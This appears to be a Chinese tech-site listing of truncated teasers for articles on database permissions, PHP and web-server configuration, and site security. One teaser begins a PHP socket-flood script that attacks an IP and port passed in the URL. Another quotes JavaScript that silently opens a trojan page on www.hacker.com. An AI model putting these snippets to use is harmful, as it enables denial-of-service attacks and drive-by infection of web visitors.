关于什么是用户权限，最简单的定义可能是，用户能做什么和不能做什么。在这里，简单的定义就相当不错了。 用户的权限分为3类： l 登录的权限； l 访问特定数据库的权限； l 在数据库中具体的对象上执行特定操作的权限。 既然我们已经看过了创建登录账户，这里将把重点放在登...

写在前面的话:大家不要把那些挂黑页挂马的黑客想得太厉害了,厉害的是不屑于这些的。这一句话就够了。 现在的黑客网站可谓是多如牛毛，不管在哪里只要你愿意学，都可以学到一招半式。看过别人的个性签名:卖菜的王大妈是黑客，烤红薯的李大爷也是黑客，对面ChengRen用品店的老...

sql server 用户访问权限设置: /*--示例说明 示例 在数据库pubs中创建一个拥有表jobs的所有权限、拥有表titles的SELECT权限的角色r_test ，随后创建了一个登录l_test，然后在数据库pubs中为登录l_test创建了用户账户u_test， 同时将用户账户u_test添加到角色r_test中，使其...

register_globals参数在 PHP 的 4.2.0 及以上版本中默认为屏蔽。虽然这并不认为是一个安全漏洞，但是的确是一个安全风险。因此，应该始终在开发过程中屏蔽register_globals。 为什么这是一个安全风险？每一种情形都需要的单独说明才能描述清楚，对于所有情形只给出一个恰当...

用PHP代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下: 代码如下: $packets = 0; $ip = $_GET[\'ip\']; $rand = $_GET[\'port\']; set_time_limit(0); ignore_user_abort(FALSE); $exec_time = $_GET[\'time\']; $time = time(); print \Flooded: $ip on port $...

在中国 现在要做一个站长很容易，网上铺天盖地的开源建站程序可以满足您的任何需求；然而，做一个站长又是那么的难，网站每天都要面临各种各样已知未知的威胁，开源的cms或者论坛程序固然好用，然而用的人多，研究的人更多，出现一个小小的漏洞，官方补丁打的不及时的话，对...

配置nginx支持php,jsp,asp,aspx 说到Nginx，大家应该比较熟悉了吧，虽然出现地比较晚，但是他优良的性能让很多系统工程师折服，并被大量的采用。网上有好多文章介绍如何如何让nginx支持jsp...

在配置虚拟用户需要，生成一个数据库文件 使用命令db_load没发用 原因:CentOS系统里没有db_load命令，我没有完全照下面的过程安装，就少了一个库，是由于没有安装db4-utils的缘故，郁闷了。 使用命令:yum -y install db4_utils 解决问题了 虚拟用户，整个安装及配置过程如下...

Windows下不能够以下面这些字样来命名文件/文件夹，包括：auxcom1com2prncon和nul等，因为这些名字都属于设备名称，等价于一个DOS设备，如果我们把文件命名为这些名字，Windows就会误以为发生重名，所以会提示不能创建同名的文件等等。 当然，有一些特殊的方法可以偷机取巧，...

在Web程序设计中，处理表单提交的数据是客户端向SERVER传递数据的主要方法，表单数据的提交方法有两种Post方法和Get方法，当使 用Post方法时，数据由标准的 输入设备读入，当使用Get方法时，数据由CGI变量QUERY_STRING传递给表单数据处理程 序，当Post方法一般不会在服务器...

现在最多见的JS挂马方法有两种，一种是直接将JavaScript脚本代码写在网页中，当访问者在浏览网页时，恶意的挂马脚本就会通过用户的浏览器悄悄地打开网马窗口，隐藏地运行。 这种方法使用的关键代码如下： window.open(http://www.hacker.com/木马.html,,toolbar=no,location...

Apache服务器走到那里，unix/linux就跟到那里，这足以说明在WEB服务器领域Apache的优良性能与市场占有率 这今天互联网的大环境下，web服务已经成为公司企业必不可少的业务，大多数的安全问题也跟随而来，攻击重点也转移为web攻击，许多web与颇有价值的客户服务与电子商业活...